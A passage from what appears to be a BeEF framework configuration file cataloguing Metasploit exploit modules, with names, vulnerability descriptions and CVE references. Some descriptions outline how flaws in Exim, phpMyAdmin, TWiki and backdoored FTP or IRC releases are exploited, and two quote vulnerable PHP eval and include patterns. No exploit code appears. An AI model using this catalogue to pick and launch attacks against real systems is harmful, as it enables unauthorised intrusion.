Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
ee6dbe3beedcd26969872c0195fc674d25d8a14d
beef/extensions/metasploit/msf-exploits.cache

16120 lines
551 KiB
Plaintext
Raw Blame History

---
msf_rpc_cmsd_opcode21:
enable: true
msf: true
msf_key: aix/rpc_cmsd_opcode21
name: AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow vulnerability in opcode 21 handled by\n\
\t\t\t\trpc.cmsd on AIX. By making a request with a long string passed to the first\n\
\t\t\t\targument of the \"rtable_create\" RPC, a stack based buffer overflow occurs. This\n\
\t\t\t\tleads to arbitrary code execution.\n\n\
\t\t\t\tNOTE: Unsuccessful attempts may cause inetd/portmapper to enter a state where\n\
\t\t\t\tfurther attempts are not possible.\n\
\t\t\t"
authors:
- - CVE
- 2009-3699
- - OSVDB
- "58726"
- - BID
- "36615"
- - URL
- http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=825
- - URL
- http://aix.software.ibm.com/aix/efixes/security/cmsd_advisory.asc
path: extensions/metasploit/
class: Msf_module
msf_rpc_ttdbserverd_realpath:
enable: true
msf: true
msf_key: aix/rpc_ttdbserverd_realpath
name: ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow vulnerability in _tt_internal_realpath\n\
\t\t\t\tfunction of the ToolTalk database server (rpc.ttdbserverd).\n\
\t\t\t"
authors:
- - CVE
- 2009-2727
- - OSVDB
- "55151"
path: extensions/metasploit/
class: Msf_module
msf_tagprinter_exec:
enable: true
msf: true
msf_key: irix/lpd/tagprinter_exec
name: Irix LPD tagprinter Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits an arbitrary command execution flaw in\n\
\t\t\t\tthe in.lpd service shipped with all versions of Irix.\n\
\t\t\t"
authors:
- - CVE
- 2001-0800
- - OSVDB
- "8573"
- - URL
- http://www.lsd-pl.net/code/IRIX/irx_lpsched.c
path: extensions/metasploit/
class: Msf_module
msf_lsass_cifs:
enable: true
msf: true
msf_key: netware/smb/lsass_cifs
name: Novell NetWare LSASS CIFS.NLM Driver Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in the NetWare CIFS.NLM driver.\n\
\t\t\t\tSince the driver runs in the kernel space, a failed exploit attempt can\n\
\t\t\t\tcause the OS to reboot.\n\
\t\t\t"
authors:
- - CVE
- 2005-2852
- - OSVDB
- "12790"
path: extensions/metasploit/
class: Msf_module
msf_pkernel_callit:
enable: true
msf: true
msf_key: netware/sunrpc/pkernel_callit
name: NetWare 6.5 SunRPC Portmapper CALLIT Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in the NetWare PKERNEL.NLM driver's CALLIT procedure.\n\
\t\t\t\tPKERNEL.NLM is installed by default on all NetWare servers to support NFS.\n\
\t\t\t\tThe PKERNEL.NLM module runs in kernel mode so a failed exploit attempt can\n\
\t\t\t\tcause the operating system to reboot.\n\
\t\t\t"
authors:
- - BID
- "36564"
- - OSVDB
- "58447"
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-09-067/
path: extensions/metasploit/
class: Msf_module
msf_clamav_milter_blackhole:
enable: true
msf: true
msf_key: unix/smtp/clamav_milter_blackhole
name: ClamAV Milter Blackhole-Mode Remote Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a flaw in the Clam AntiVirus suite 'clamav-milter'\n\
\t\t\t\t(Sendmail mail filter). Versions prior to v0.92.2 are vulnerable.\n\
\t\t\t\tWhen implemented with black hole mode enabled, it is possible to execute\n\
\t\t\t\tcommands remotely due to an insecure popen call.\n\
\t\t\t"
authors:
- - CVE
- 2007-4560
- - OSVDB
- "36909"
- - BID
- "25439"
- - URL
- http://www.milw0rm.com/exploits/4761
path: extensions/metasploit/
class: Msf_module
msf_exim4_string_format:
enable: true
msf: true
msf_key: unix/smtp/exim4_string_format
name: Exim4 <= 4.69 string_format Function Heap Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a heap buffer overflow within versions of Exim prior to\n\
\t\t\t\tversion 4.69. By sending a specially crafted message, an attacker can corrupt the\n\
\t\t\t\theap and execute arbitrary code with the privileges of the Exim daemon.\n\n\
\t\t\t\tThe root cause is that no check is made to ensure that the buffer is not full\n\
\t\t\t\tprior to handling '%s' format specifiers within the 'string_vformat' function.\n\
\t\t\t\tIn order to trigger this issue, we get our message rejected by sending a message\n\
\t\t\t\tthat is too large. This will call into log_write to log rejection headers (which\n\
\t\t\t\tis a default configuration setting). After filling the buffer, a long header\n\
\t\t\t\tstring is sent. In a successful attempt, it overwrites the ACL for the 'MAIL\n\
\t\t\t\tFROM' command. By sending a second message, the string we sent will be evaluated\n\
\t\t\t\twith 'expand_string' and arbitrary shell commands can be executed.\n\n\
\t\t\t\tIt is likely that this issue could also be exploited using other techniques such\n\
\t\t\t\tas targeting in-band heap management structures, or perhaps even function pointers\n\
\t\t\t\tstored in the heap. However, these techniques would likely be far more platform\n\
\t\t\t\tspecific, more complicated, and less reliable.\n\n\
\t\t\t\tThis bug was original found and reported in December 2008, but was not\n\
\t\t\t\tproperly handled as a security issue. Therefore, there was a 2 year lag time\n\
\t\t\t\tbetween when the issue was fixed and when it was discovered being exploited\n\
\t\t\t\tin the wild. At that point, the issue was assigned a CVE and began being\n\
\t\t\t\taddressed by downstream vendors.\n\n\
\t\t\t\tAn additional vulnerability, CVE-2010-4345, was also used in the attack that\n\
\t\t\t\tled to the discovery of danger of this bug. This bug allows a local user to\n\
\t\t\t\tgain root privileges from the Exim user account. If the Perl interpreter is\n\
\t\t\t\tfound on the remote system, this module will automatically exploit the\n\
\t\t\t\tsecondary bug as well to get root.\n\
\t\t\t"
authors:
- - CVE
- 2010-4344
- - OSVDB
- "69685"
- - BID
- "45308"
- - CVE
- 2010-4345
- - BID
- "45341"
- - URL
- http://seclists.org/oss-sec/2010/q4/311
- - URL
- http://www.gossamer-threads.com/lists/exim/dev/89477
- - URL
- http://bugs.exim.org/show_bug.cgi?id=787
- - URL
- http://git.exim.org/exim.git/commitdiff/24c929a27415c7cfc7126c47e4cad39acf3efa6b
path: extensions/metasploit/
class: Msf_module
msf_spamassassin_exec:
enable: true
msf: true
msf_key: unix/misc/spamassassin_exec
name: SpamAssassin spamd Remote Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a flaw in the SpamAssassin spamd service by specifying\n\
\t\t\t\ta malicious vpopmail User header, when running with vpopmail and paranoid\n\
\t\t\t\tmodes enabled (non-default). Versions prior to v3.1.3 are vulnerable\n\
\t\t\t"
authors:
- - CVE
- 2006-2447
- - OSVDB
- "26177"
- - BID
- "18290"
- - URL
- http://spamassassin.apache.org/advisories/cve-2006-2447.txt
path: extensions/metasploit/
class: Msf_module
msf_zabbix_agent_exec:
enable: true
msf: true
msf_key: unix/misc/zabbix_agent_exec
name: Zabbix Agent net.tcp.listen Command Injection
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a metacharacter injection vulnerability\n\
\t\t\t\tin the FreeBSD and Solaris versions of the Zabbix agent. This flaw\n\
\t\t\t\tcan only be exploited if the attacker can hijack the IP address\n\
\t\t\t\tof an authorized server (as defined in the configuration file).\n\
\t\t\t"
authors:
- - CVE
- 2009-4502
- - OSVDB
- "60956"
- - URL
- https://support.zabbix.com/browse/ZBX-1032
path: extensions/metasploit/
class: Msf_module
msf_distcc_exec:
enable: true
msf: true
msf_key: unix/misc/distcc_exec
name: DistCC Daemon Command Execution
category: Metasploit
description: "\n\
\t\t\t\tThis module uses a documented security weakness to execute\n\
\t\t\t\tarbitrary commands on any system running distccd.\n\n\
\t\t\t"
authors:
- - CVE
- 2004-2687
- - OSVDB
- "13378"
- - URL
- http://distcc.samba.org/security.html
path: extensions/metasploit/
class: Msf_module
msf_vsftpd_234_backdoor:
enable: true
msf: true
msf_key: unix/ftp/vsftpd_234_backdoor
name: VSFTPD v2.3.4 Backdoor Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a malicious backdoor that was added to the\tVSFTPD download\n\
\t\t\t\t\tarchive. This backdoor was introdcued into the vsftpd-2.3.4.tar.gz archive between\n\
\t\t\t\t\tJune 30th 2011 and July 1st 2011 according to the most recent information\n\
\t\t\t\t\tavailable. This backdoor was removed on July 3rd 2011.\n\
\t\t\t"
authors:
- - OSVDB
- "73573"
- - URL
- http://pastebin.com/AetT9sS5
- - URL
- http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
path: extensions/metasploit/
class: Msf_module
msf_proftpd_133c_backdoor:
enable: true
msf: true
msf_key: unix/ftp/proftpd_133c_backdoor
name: ProFTPD-1.3.3c Backdoor Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a malicious backdoor that was added to the\n\
\t\t\t\tProFTPD download archive. This backdoor was present in the proftpd-1.3.3c.tar.[bz2|gz]\n\
\t\t\t\tarchive between November 28th 2010 and 2nd December 2010.\n\
\t\t\t"
authors:
- - OSVDB
- "69562"
- - BID
- "45150"
- - URL
- http://sourceforge.net/mailarchive/message.php?msg_name=alpine.DEB.2.00.1012011542220.12930%40familiar.castaglia.org
path: extensions/metasploit/
class: Msf_module
msf_contentkeeperweb_mimencode:
enable: true
msf: true
msf_key: unix/http/contentkeeperweb_mimencode
name: ContentKeeper Web Remote Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits the ContentKeeper Web Appliance. Versions prior\n\
\t\t\t\tto 125.10 are affected. This module exploits a combination of weaknesses\n\
\t\t\t\tto enable remote command execution as the Apache user. By setting\n\
\t\t\t\tSkipEscalation to false, this module will attempt to setuid the bash shell.\n\
\t\t\t"
authors:
- - OSVDB
- "54551"
- - OSVDB
- "54552"
- - URL
- http://www.aushack.com/200904-contentkeeper.txt
path: extensions/metasploit/
class: Msf_module
msf_unreal_ircd_3281_backdoor:
enable: true
msf: true
msf_key: unix/irc/unreal_ircd_3281_backdoor
name: UnrealIRCD 3.2.8.1 Backdoor Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a malicious backdoor that was added to the\n\
\t\t\t\tUnreal IRCD 3.2.8.1 download archive. This backdoor was present in the\n\
\t\t\t\tUnreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.\n\
\t\t\t"
authors:
- - CVE
- 2010-2075
- - OSVDB
- "65445"
- - URL
- http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt
path: extensions/metasploit/
class: Msf_module
msf_awstatstotals_multisort:
enable: true
msf: true
msf_key: unix/webapp/awstatstotals_multisort
name: AWStats Totals =< v1.14 multisort Remote Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits an arbitrary command execution vulnerability in the\n\
\t\t\t\t\tAWStats Totals PHP script. AWStats Totals version v1.0 - v1.14 are vulnerable.\n\
\t\t\t"
authors:
- - CVE
- 2008-3922
- - OSVDB
- "47807"
- - BID
- "30856"
- - URL
- http://userwww.service.emory.edu/~ekenda2/EMORY-2008-01.txt
path: extensions/metasploit/
class: Msf_module
msf_coppermine_piceditor:
enable: true
msf: true
msf_key: unix/webapp/coppermine_piceditor
name: Coppermine Photo Gallery <= 1.4.14 picEditor.php Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in the picEditor.php script of Coppermine\n\
\t\t\t\tPhoto Gallery. When configured to use the ImageMagick library, the 'quality', 'angle',\n\
\t\t\t\tand 'clipval' parameters are not properly escaped before being passed to the PHP\n\
\t\t\t\t'exec' command.\n\n\
\t\t\t\tIn order to reach the vulnerable 'exec' call, the input must pass several validation\n\
\t\t\t\tsteps.\n\n\
\t\t\t\tThe vulnerabilities actually reside in the following functions:\n\n\
\t\t\t\timage_processor.php: rotate_image(...)\n\
\t\t\t\tinclude/imageObjectIM.class.php: imageObject::cropImage(...)\n\
\t\t\t\tinclude/imageObjectIM.class.php: imageObject::rotateImage(...)\n\
\t\t\t\tinclude/imageObjectIM.class.php: imageObject::resizeImage(...)\n\
\t\t\t\tinclude/picmgmt.inc.php: resize_image(...)\n\n\
\t\t\t\tNOTE: Use of the ImageMagick library is a non-default option. However, a user can\n\
\t\t\t\tspecify its use at installation time.\n\
\t\t\t"
authors:
- - CVE
- 2008-0506
- - OSVDB
- "41676"
- - URL
- http://www.exploit-db.com/exploits/5019
- - URL
- http://forum.coppermine-gallery.net/index.php?topic=50103.0
path: extensions/metasploit/
class: Msf_module
msf_php_vbulletin_template:
enable: true
msf: true
msf_key: unix/webapp/php_vbulletin_template
name: vBulletin misc.php Template Name Arbitrary Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits an arbitrary PHP code execution flaw in\n\
\t\t\t\tthe vBulletin web forum software. This vulnerability is only\n\
\t\t\t\tpresent when the \"Add Template Name in HTML Comments\" option\n\
\t\t\t\tis enabled. All versions of vBulletin prior to 3.0.7 are\n\
\t\t\t\taffected.\n\
\t\t\t"
authors:
- - CVE
- 2005-0511
- - BID
- "12622"
- - OSVDB
- "14047"
path: extensions/metasploit/
class: Msf_module
msf_sphpblog_file_upload:
enable: true
msf: true
msf_key: unix/webapp/sphpblog_file_upload
name: Simple PHP Blog <= 0.4.0 Remote Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module combines three separate issues within The Simple PHP Blog (<= 0.4.0)\n\
\t\t\t\tapplication to upload arbitrary data and thus execute a shell. The first\n\
\t\t\t\tvulnerability exposes the hash file (password.txt) to unauthenticated users.\n\
\t\t\t\tThe second vulnerability lies within the image upload system provided to\n\
\t\t\t\tlogged-in users; there is no image validation function in the blogger to\n\
\t\t\t\tprevent an authenticated user from uploading any file type. The third\n\
\t\t\t\tvulnerability occurs within the blog comment functionality, allowing\n\
\t\t\t\tarbitrary files to be deleted.\n\
\t\t\t"
authors:
- - CVE
- 2005-2733
- - OSVDB
- "19012"
- - BID
- "14667"
- - URL
- http://www.milw0rm.com/exploits/1191
path: extensions/metasploit/
class: Msf_module
msf_awstats_migrate_exec:
enable: true
msf: true
msf_key: unix/webapp/awstats_migrate_exec
name: AWStats migrate Remote Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits an arbitrary command execution vulnerability in the\n\
\t\t\t\tAWStats CGI script. AWStats v6.4 and v6.5 are vulnerable. Perl based\n\
\t\t\t\tpayloads are recommended with this module. The vulnerability is only\n\
\t\t\t\tpresent when AllowToUpdateStatsFromBrowser is enabled in the AWstats\n\
\t\t\t\tconfiguration file (non-default).\n\
\t\t\t"
authors:
- - CVE
- 2006-2237
- - OSVDB
- "25284"
- - BID
- "17844"
- - URL
- http://awstats.sourceforge.net/awstats_security_news.php
- - URL
- http://www.milw0rm.com/exploits/1755
path: extensions/metasploit/
class: Msf_module
msf_oscommerce_filemanager:
enable: true
msf: true
msf_key: unix/webapp/oscommerce_filemanager
name: osCommerce 2.2 Arbitrary PHP Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\tosCommerce is a popular open source E-Commerce application.\n\
\t\t\t\tThe admin console contains a file management utility that\n\
\t\t\t\tallows administrators to upload, download, and edit files.\n\
\t\t\t\tThis could be abused to allow unauthenticated attackers to\n\
\t\t\t\texecute arbitrary code with the permissions of the\n\
\t\t\t\twebserver.\n\
\t\t\t"
authors:
- - OSVDB
- "60018"
- - URL
- http://www.milw0rm.com/exploits/9556
path: extensions/metasploit/
class: Msf_module
msf_php_eval:
enable: true
msf: true
msf_key: unix/webapp/php_eval
name: Generic PHP Code eval
category: Metasploit
description: "\n\
\t\t\t\tExploits things like <?php eval($_REQUEST['evalme']); ?>\n\
\t\t\t\tIt is likely that HTTP evasion options will break this exploit.\n\
\t\t\t"
authors: []
path: extensions/metasploit/
class: Msf_module
msf_squirrelmail_pgp_plugin:
enable: true
msf: true
msf_key: unix/webapp/squirrelmail_pgp_plugin
name: SquirrelMail PGP Plugin command execution (SMTP)
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a command execution vulnerability in the\n\
\t\t\t\tPGP plugin of SquirrelMail. This flaw was found while quickly\n\
\t\t\t\tgrepping the code after release of some information at\n\
\t\t\t\thttp://www.wslabi.com/. Later, iDefense published an advisory ....\n\n\
\t\t\t\tReading an email in SquirrelMail with the PGP plugin activated\n\
\t\t\t\tis enough to compromise the underlying server.\n\n\
\t\t\t\tOnly \"cmd/unix/generic\" payloads were tested.\n\
\t\t\t"
authors:
- - CVE
- 2003-0990
- - OSVDB
- "3178"
- - URL
- http://lists.immunitysec.com/pipermail/dailydave/2007-July/004456.html
- - URL
- http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=330
- - URL
- http://www.wslabi.com/wabisabilabi/initPublishedBid.do?
path: extensions/metasploit/
class: Msf_module
msf_twiki_history:
enable: true
msf: true
msf_key: unix/webapp/twiki_history
name: TWiki History TWikiUsers rev Parameter Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in the history component of TWiki.\n\
\t\t\t\tBy passing a 'rev' parameter containing shell metacharacters to the TWikiUsers\n\
\t\t\t\tscript, an attacker can execute arbitrary OS commands.\n\
\t\t\t"
authors:
- - CVE
- 2005-2877
- - OSVDB
- "19403"
- - BID
- "14834"
- - URL
- http://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithRev
path: extensions/metasploit/
class: Msf_module
msf_dogfood_spell_exec:
enable: true
msf: true
msf_key: unix/webapp/dogfood_spell_exec
name: Dogfood CRM spell.php Remote Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a previously unpublished vulnerability in the\n\
\t\t\t\tDogfood CRM mail function which is vulnerable to command injection\n\
\t\t\t\tin the spell check feature. Because of character restrictions, this\n\
\t\t\t\texploit works best with the double-reverse telnet payload. This\n\
\t\t\t\tvulnerability was discovered by LSO and affects v2.0.10.\n\
\t\t\t"
authors:
- - OSVDB
- "54707"
- - URL
- http://downloads.sourceforge.net/dogfood/
path: extensions/metasploit/
class: Msf_module
msf_openx_banner_edit:
enable: true
msf: true
msf_key: unix/webapp/openx_banner_edit
name: OpenX banner-edit.php File Upload PHP Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in the OpenX advertising software.\n\
\t\t\t\tIn versions prior to version 2.8.2, authenticated users can upload files\n\
\t\t\t\twith arbitrary extensions to be used as banner creative content. By uploading\n\
\t\t\t\ta file with a PHP extension, an attacker can execute arbitrary PHP code.\n\n\
\t\t\t\tNOTE: The file must also return either \"png\", \"gif\", or \"jpeg\" as its image\n\
\t\t\t\ttype as returned from the PHP getimagesize() function.\n\
\t\t\t"
authors:
- - CVE
- 2009-4098
- - OSVDB
- "60499"
- - BID
- "37110"
- - URL
- http://archives.neohapsis.com/archives/bugtraq/2009-11/0166.html
- - URL
- https://developer.openx.org/jira/browse/OX-5747
- - URL
- http://www.openx.org/docs/2.8/release-notes/openx-2.8.2
- - URL
- http://php.net/manual/en/function.getimagesize.php
- - URL
- http://gynvael.coldwind.pl/?id=223
- - URL
- http://gynvael.coldwind.pl/?id=224
- - URL
- http://gynvael.coldwind.pl/?id=235
- - URL
- http://programming.arantius.com/the+smallest+possible+gif
- - URL
- http://stackoverflow.com/questions/2253404/what-is-the-smallest-valid-jpeg-file-size-in-bytes
path: extensions/metasploit/
class: Msf_module
msf_tikiwiki_jhot_exec:
enable: true
msf: true
msf_key: unix/webapp/tikiwiki_jhot_exec
name: TikiWiki jhot Remote Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tTikiWiki contains a flaw that may allow a malicious user to execute\n\
\t\t\t\tarbitrary PHP code. The issue is triggered due to the jhot.php script\n\
\t\t\t\tnot correctly verifying uploaded files. It is possible that the flaw\n\
\t\t\t\tmay allow arbitrary PHP code execution by uploading a malicious PHP\n\
\t\t\t\tscript resulting in a loss of integrity.\n\n\
\t\t\t\tThe vulnerability was reported in Tikiwiki version 1.9.4.\n\
\t\t\t"
authors:
- - CVE
- 2006-4602
- - OSVDB
- "28456"
- - BID
- "19819"
- - URL
- http://secunia.com/advisories/21733/
path: extensions/metasploit/
class: Msf_module
msf_qtss_parse_xml_exec:
enable: true
msf: true
msf_key: unix/webapp/qtss_parse_xml_exec
name: QuickTime Streaming Server parse_xml.cgi Remote Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThe QuickTime Streaming Server contains a CGI script that is vulnerable\n\
\t\t\t\tto metacharacter injection, allow arbitrary commands to be executed as root.\n\
\t\t\t\t"
authors:
- - OSVDB
- "10562"
- - BID
- "6954"
- - CVE
- 2003-0050
path: extensions/metasploit/
class: Msf_module
msf_phpbb_highlight:
enable: true
msf: true
msf_key: unix/webapp/phpbb_highlight
name: phpBB viewtopic.php Arbitrary Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits two arbitrary PHP code execution flaws in the\n\
\t\t\t\tphpBB forum system. The problem is that the 'highlight' parameter\n\
\t\t\t\tin the 'viewtopic.php' script is not verified properly and will\n\
\t\t\t\tallow an attacker to inject arbitrary code via preg_replace().\n\n\
\t\t\t\tThis vulnerability was introduced in revision 3076, and finally\n\
\t\t\t\tfixed in revision 5166. According to the \"tags\" within their tree,\n\
\t\t\t\tthis corresponds to versions 2.0.4 through 2.0.15 (inclusive).\n\
\t\t\t"
authors:
- - CVE
- 2005-2086
- - CVE
- 2004-1315
- - OSVDB
- "11719"
- - OSVDB
- "17613"
- - BID
- "14086"
- - BID
- "10701"
path: extensions/metasploit/
class: Msf_module
msf_php_include:
enable: true
msf: true
msf_key: unix/webapp/php_include
name: PHP Remote File Include Generic Exploit
category: Metasploit
description: "\n\
\t\t\t\t\tThis module can be used to exploit any generic PHP file include vulnerability,\n\
\t\t\t\twhere the application includes code like the following:\n\n\
\t\t\t\t<?php include($_GET['path']); ?>\n\
\t\t\t"
authors: []
path: extensions/metasploit/
class: Msf_module
msf_nagios3_statuswml_ping:
enable: true
msf: true
msf_key: unix/webapp/nagios3_statuswml_ping
name: Nagios3 statuswml.cgi Ping Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module abuses a metacharacter injection vulnerability in the\n\
\t\t\t\tNagios3 statuswml.cgi script. This flaw is triggered when shell\n\
\t\t\t\tmetacharacters are present in the parameters to the ping and\n\
\t\t\t\ttraceroute commands.\n\
\t\t\t"
authors:
- - CVE
- 2009-2288
- - OSVDB
- "55281"
path: extensions/metasploit/
class: Msf_module
msf_google_proxystylesheet_exec:
enable: true
msf: true
msf_key: unix/webapp/google_proxystylesheet_exec
name: Google Appliance ProxyStyleSheet Command Execution
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a feature in the Saxon XSLT parser used by\n\
\t\t\tthe Google Search Appliance. This feature allows for arbitrary\n\
\t\t\tjava methods to be called. Google released a patch and advisory to\n\
\t\t\ttheir client base in August of 2005 (GA-2005-08-m). The target appliance\n\
\t\t\tmust be able to connect back to your machine for this exploit to work.\n\
\t\t\t"
authors:
- - CVE
- 2005-3757
- - OSVDB
- "20981"
- - BID
- "15509"
path: extensions/metasploit/
class: Msf_module
msf_php_wordpress_lastpost:
enable: true
msf: true
msf_key: unix/webapp/php_wordpress_lastpost
name: WordPress cache_lastpostdate Arbitrary Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits an arbitrary PHP code execution flaw in the WordPress\n\
\t\t\t\tblogging software. This vulnerability is only present when the PHP 'register_globals'\n\
\t\t\t\toption is enabled (common for hosting providers). All versions of WordPress prior to\n\
\t\t\t\t1.5.1.3 are affected.\n\
\t\t\t"
authors:
- - CVE
- 2005-2612
- - OSVDB
- "18672"
- - BID
- "14533"
path: extensions/metasploit/
class: Msf_module
msf_twiki_search:
enable: true
msf: true
msf_key: unix/webapp/twiki_search
name: TWiki Search Function Arbitrary Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in the search component of TWiki.\n\
\t\t\t\tBy passing a 'search' parameter containing shell metacharacters to the\n\
\t\t\t\t'WebSearch' script, an attacker can execute arbitrary OS commands.\n\
\t\t\t"
authors:
- - CVE
- 2004-1037
- - OSVDB
- "11714"
- - BID
- "11674"
- - URL
- http://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithSearch
path: extensions/metasploit/
class: Msf_module
msf_phpmyadmin_config:
enable: true
msf: true
msf_key: unix/webapp/phpmyadmin_config
name: PhpMyAdmin Config File Code Injection
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in PhpMyAdmin's setup\n\
\t\t\t\tfeature which allows an attacker to inject arbitrary PHP\n\
\t\t\t\tcode into a configuration file. The original advisory says\n\
\t\t\t\tthe vulnerability is present in phpMyAdmin versions 2.11.x\n\
\t\t\t\t< 2.11.9.5 and 3.x < 3.1.3.1; this module was tested on\n\
\t\t\t\t3.0.1.1.\n\n\
\t\t\t\tThe file where our payload is written\n\
\t\t\t\t(phpMyAdmin/config/config.inc.php) is not directly used by\n\
\t\t\t\tthe system, so it may be a good idea to either delete it or\n\
\t\t\t\tcopy the running config (phpMyAdmin/config.inc.php) over it\n\
\t\t\t\tafter successful exploitation.\n\
\t\t\t"
authors:
- - CVE
- 2009-1151
- - OSVDB
- "53076"
- - URL
- http://www.milw0rm.com/exploits/8921
- - URL
- http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php
- - URL
- http://labs.neohapsis.com/2009/04/06/about-cve-2009-1151/
path: extensions/metasploit/
class: Msf_module
msf_generic_exec:
enable: true
msf: true
msf_key: unix/webapp/generic_exec
name: Generic Web Application Unix Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module can be used to exploit any generic command execution vulnerability\n\
\t\t\t\tfor CGI applications on Unix-like platforms. To use this module, specify the\n\
\t\t\t\tCMDURI path, replacing the command itself with XXcmdXX. This module is currently\n\
\t\t\t\tlimited to forms vulnerable through GET requests with query parameters.\n\
\t\t\t"
authors: []
path: extensions/metasploit/
class: Msf_module
msf_citrix_access_gateway_exec:
enable: true
msf: true
msf_key: unix/webapp/citrix_access_gateway_exec
name: Citrix Access Gateway Command Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThe Citrix Access Gateway provides support for multiple authentication types.\n\
\t\t\t\tWhen utilizing the external legacy NTLM authentication module known as\n\
\t\t\t\tntlm_authenticator the Access Gateway spawns the Samba 'samedit' command\n\
\t\t\t\tline utility to verify a user's identity and password. By embedding shell\n\
\t\t\t\tmetacharacters in the web authentication form it is possible to execute\n\
\t\t\t\tarbitrary commands on the Access Gateway.\n\
\t\t\t"
authors:
- - CVE
- 2010-4566
- - OSVDB
- "70099"
- - BID
- "45402"
- - URL
- http://www.vsecurity.com/resources/advisory/20101221-1/
path: extensions/metasploit/
class: Msf_module
msf_cakephp_cache_corruption:
enable: true
msf: true
msf_key: unix/webapp/cakephp_cache_corruption
name: CakePHP <= 1.3.5 / 1.2.8 Cache Corruption Exploit
category: Metasploit
description: "\n\
\t\t\t\t\tCakePHP is a popular PHP framework for building web applications.\n\
\t\t\t\tThe Security component of CakePHP is vulnerable to an unserialize attack which\n\
\t\t\t\tcould be abused to allow unauthenticated attackers to execute arbitrary\n\
\t\t\t\tcode with the permissions of the webserver.\n\
\t\t\t"
authors:
- - OSVDB
- "69352"
- - CVE
- 2010-4335
- - BID
- "44852"
- - URL
- http://packetstormsecurity.org/files/view/95847/burnedcake.py.txt
path: extensions/metasploit/
class: Msf_module
msf_oracle_vm_agent_utl:
enable: true
msf: true
msf_key: unix/webapp/oracle_vm_agent_utl
name: Oracle VM Server Virtual Server Agent Command Injection
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a command injection flaw within Oracle\\'s VM Server\n\
\t\t\t\tVirtual Server Agent (ovs-agent) service.\n\n\
\t\t\t\tBy including shell meta characters within the second parameter to the 'utl_test_url'\n\
\t\t\t\tXML-RPC methodCall, an attacker can execute arbitrary commands. The service\n\
\t\t\t\ttypically runs with root privileges.\n\n\
\t\t\t\tNOTE: Valid credentials are required to trigger this vulnerable. The username\n\
\t\t\t\tappears to be hardcoded as 'oracle', but the password is set by the administrator\n\
\t\t\t\tat installation time.\n\
\t\t\t"
authors:
- - CVE
- 2010-3585
- - OSVDB
- "68797"
- - BID
- "44047"
path: extensions/metasploit/
class: Msf_module
msf_tikiwiki_graph_formula_exec:
enable: true
msf: true
msf_key: unix/webapp/tikiwiki_graph_formula_exec
name: TikiWiki tiki-graph_formula Remote PHP Code Execution
category: Metasploit
description: "\n\
\t\t\t\t\tTikiWiki (<= 1.9.8) contains a flaw that may allow a remote\n\
\t\t\t\tattacker to execute arbitrary PHP code. The issue is due to\n\
\t\t\t\t'tiki-graph_formula.php' script not properly sanitizing user\n\
\t\t\t\tinput supplied to create_function(), which may allow a remote\n\
\t\t\t\tattacker to execute arbitrary PHP code resulting in a loss of\n\
\t\t\t\tintegrity.\n\
\t\t\t"
authors:
- - CVE
- 2007-5423
- - OSVDB
- "40478"
- - BID
- "26006"
path: extensions/metasploit/
class: Msf_module
msf_guestbook_ssi_exec:
enable: true
msf: true
msf_key: unix/webapp/guestbook_ssi_exec
name: Matt Wright guestbook.pl Arbitrary Command Execution
category: Metasploit
description: "\n\
\t\t\t\tThe Matt Wright guestbook.pl <= v2.3.1 CGI script contains\n\
\t\t\t\ta flaw that may allow arbitrary command execution. The vulnerability\n\
\t\t\t\trequires that HTML posting is enabled in the guestbook.pl script, and\n\
\t\t\t\tthat the web server must have the Server-Side Include (SSI) script\n\
\t\t\t\thandler enabled for the '.html' file type. By combining the script\n\
